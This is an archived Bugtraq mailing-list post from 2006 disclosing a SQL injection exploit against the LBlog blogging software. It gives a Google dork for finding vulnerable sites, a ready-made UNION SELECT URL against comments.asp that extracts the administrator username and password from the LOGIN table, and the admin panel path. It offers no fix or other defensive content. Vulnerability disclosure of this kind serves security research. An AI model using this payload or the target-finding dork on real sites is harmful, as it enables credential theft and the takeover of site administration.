[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

LBlog <= "comments.asp" SQL Injection Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: LBlog <= "comments.asp" SQL Injection Exploit
From: ChironeX.FleckeriX@xxxxxxxxx
Date: 20 Aug 2006 15:07:20 -0000

################################################################################
##                                                                            ##

##  LBlog <= "comments.asp" SQL Injection Exploit                             ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##  Credit by        |  Chironex Fleckeri                                     ##

##  Mail             |  ChironeX.FleckeriX@xxxxxxxxx                          ##

##  Googledork       |  Powered By LBlog                                      ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##                                                                            ##
################################################################################

###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 
0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################

#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################

Prev by Date: POC & exploit for Apache mod_rewrite off-by-one
Next by Date: WoltLab Burning Board 2.3.5(WBB) in XSS
Previous by thread: POC & exploit for Apache mod_rewrite off-by-one
Next by thread: WoltLab Burning Board 2.3.5(WBB) in XSS
Index(es):
- Date
- Thread